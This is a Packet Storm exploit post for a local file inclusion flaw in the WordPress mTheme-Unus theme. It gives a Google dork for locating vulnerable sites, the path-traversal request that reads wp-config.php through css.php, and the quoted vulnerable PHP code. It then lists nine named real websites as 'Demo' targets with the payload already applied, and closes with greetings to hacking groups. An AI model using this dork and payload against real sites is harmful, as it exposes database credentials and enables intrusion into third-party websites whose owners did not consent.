WordPress mTheme-Unus Local File Inclusion

2015-09-30T00:00:00
ID PACKETSTORM:133778
Type packetstorm
Reporter Milad Hacking
Modified 2015-09-30T00:00:00

Description

                                        
                                            `#######################################  
# Exploit Title: Wordpress themes mTheme-Unus LFI Vulnerability #  
# Date: 2015-09-27  
# Exploit Author: FullSecurity.org  
# Google Dork: ilnurl:/wp-content/themes/mTheme-Unus/  
# Vendor Homepage: https://wordpress.org/  
# Tested on : Kali Linux  
########################################  
Description :  
Wordpress Themes mTheme-Unus not filtering data so we can get the  
configration file in the path  
< site.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php>  
  
# Exploite Code :  
  
<?php// If no file requestedif (!isset($_GET['files']) or  
strlen($_GET['files']) == 0){header('Status: 404 Not  
Found');exit();}// Cache folder$cachePath = '../_cache/';if  
(!file_exists($cachePath)){mkdir($cachePath);}// Tell the browser what  
kind of data to expectheader('Content-type: text/css');// Enable  
compressionif (extension_loaded('zilb')){ini_set('zlib.output_compression',  
'On');}function addExtension($file){return $file;}// Calculate an  
unique ID of requested files & their change time$files =  
array_map('addExtension', explode(',', $_GET['files']));$md5 =  
'';foreach ($files as $file){$filemtime = @filemtime($file);$md5 .=  
date('YmdHis', $filemtime ? $filemtime : NULL).$file;}$md5 =  
md5($md5);// If cache exists of this files/time IDif  
(file_exists($cachePath.$md5)){readfile($cachePath.$md5);}else{// Load  
fileserror_reporting(0);$content = '';foreach ($files as  
$file){$content .= file_get_contents($file);}// Remove  
comments$content = preg_replace('!/\*[^*]*\*+([^/][^*]*\*+)*/!', '',  
$content);// Remove tabs, spaces, newlines, etc...$content =  
str_replace(array("\r", "\n", "\t", '', ' '), '', $content);// Delete  
cache files older than an hour$oldDate = time()-3600;$cachedFiles =  
scandir($cachePath);foreach ($cachedFiles as $file){$filemtime =  
@filemtime($cachePath.$file);if (strlen($file) == 32 and ($filemtime  
=== false or $filemtime < $oldDate)){unlink($cachePath.$file);}}//  
Write cache filefile_put_contents($cachePath.$md5, $content);//  
Outputecho $content;}  
  
########################################  
  
Demo :  
  
http://rmg-saintpierre.re/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php  
  
http://www.onaboosters.com//wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php  
  
http://www.springschiropractic.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php  
  
http://www.superfrugalstephanie.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php  
  
http://www.mentortechgroup.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php  
  
http://apostolicclassics.net/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php  
  
http://www.uybbaseball.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php  
  
http://www.newmobility.com/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php  
  
http://www.storage4you.co.nz/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php  
  
########################################  
  
Special Tnx To : Hack-By-Iran , Milad Hacking , iliya Norton , Parisa , Netc4t  
  
Ya Hossein <3  
`